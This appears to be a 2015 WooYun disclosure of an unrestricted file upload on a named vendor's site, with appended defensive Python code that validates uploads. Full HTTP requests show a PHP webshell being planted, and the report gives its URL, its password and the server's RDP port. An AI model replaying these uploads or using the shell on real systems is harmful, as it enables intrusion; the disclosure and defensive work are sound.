2015-03-12: Details reported to the vendor, awaiting the vendor's handling
2015-03-12: Vendor confirmed; details disclosed to the vendor only
2015-03-22: Details disclosed to core white hats and relevant domain experts
2015-04-01: Details disclosed to regular white hats
2015-04-11: Details disclosed to intern white hats
2015-04-26: Details disclosed to the public
Saw a newly registered vendor on WooYun today and googled it. Found an upload feature at:
http://wx.api.dawenmedia.com/wxdw/register/bride
Then tried an upload; the captured upload request was:
POST /wxdw/upload/save HTTP/1.1
Host: wx.api.dawenmedia.com
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://wx.api.dawenmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmK
Referer: http://wx.api.dawenmedia.com/wxdw/register/bride
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106

------WebKitFormBoundary5YWHdlXH7ttQHDmK
Content-Disposition: form-data; name="myData"; filename="test.jpg"
Content-Type: image/jpeg

test wooyun
------WebKitFormBoundary5YWHdlXH7ttQHDmK--
Changed the file name and declared type to:
POST /wxdw/upload/save HTTP/1.1
Host: wx.api.dawenmedia.com
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://wx.api.dawenmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmK
Referer: http://wx.api.dawenmedia.com/wxdw/register/bride
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106

------WebKitFormBoundary5YWHdlXH7ttQHDmK
Content-Disposition: form-data; name="myData"; filename="test.txt"
Content-Type: txt/txt

test wooyun
------WebKitFormBoundary5YWHdlXH7ttQHDmK--
Tried uploading the text file; the response was:
HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 12 Mar 2015 08:40:17 GMT
Content-Length: 123

{"url":"attachment\/2015\/03\/20150312164017480509.txt","url_thumb":"attachment\/2015\/03\/20150312164017480509_thumb.txt"}
Built the full path from the returned URL:
http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312164017480509.txt
Then changed the extension to PHP; the upload was accepted and returned this path:
http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162755649840.php
Then uploaded a PHP one-liner for the China Chopper (菜刀) client and got this URL:
http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162934728860.php
Password: pass
The server runs Windows Server 2008.
The terminal services (RDP) port is 33669. Stopped here and did not upload any privilege-escalation tools. That is as far as this goes.
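The endpoint above accepted whatever filename and Content-Type the client sent and stored the file under the web root with that extension. As an added example (not the vendor's code, and an assumed policy rather than anything from the report), here is the server-side validation that would have stopped each step: an extension allowlist, a check of the file's own magic bytes rather than the client-declared Content-Type, and a random server-chosen storage name. The sample inputs are constructed stand-ins for the report's test.jpg, test.txt and .php uploads.

```python
import os
import secrets

# Allowlisted extensions and required magic bytes (assumed policy for this example, not the vendor's code).
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised with a reason string when an upload fails validation."""


def validate_upload(filename, content_type, data):
    """Return a server-chosen storage name for an accepted upload, else raise UploadRejected."""
    # Take only the extension; the client's basename and any path parts are never reused.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")
    # The declared Content-Type is client-controlled: check it, but never rely on it alone.
    if not content_type.lower().startswith("image/"):
        raise UploadRejected(f"unexpected Content-Type: {content_type}")
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected("file content does not match extension")
    # Random name with the allowlisted extension, so the stored path is never attacker-chosen.
    return secrets.token_hex(16) + ext


def check_sample_uploads():
    """Run constructed stand-ins for the report's uploads through the validator."""
    cases = {
        "jpeg": ("test.jpg", "image/jpeg", b"\xff\xd8\xff\xe0test wooyun"),
        "txt": ("test.txt", "txt/txt", b"test wooyun"),
        "php": ("test.php", "image/jpeg", b"<?php echo 1;"),
        "spoofed": ("test.jpg", "image/jpeg", b"test wooyun"),
    }
    results = {}
    for name, (fname, ctype, body) in cases.items():
        try:
            validate_upload(fname, ctype, body)
            results[name] = "accepted"
        except UploadRejected as exc:
            results[name] = f"rejected: {exc}"
    return results
```

The "spoofed" case shows why the magic-byte check matters: a correct extension and Content-Type still get rejected when the bytes are not an image. Storing uploads outside the web root, or serving them from a host with script execution disabled, closes the remaining gap.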
Severity: High
Vulnerability rank: 10
Confirmed: 2015-03-12 20:18
Handled; the impact is quite serious.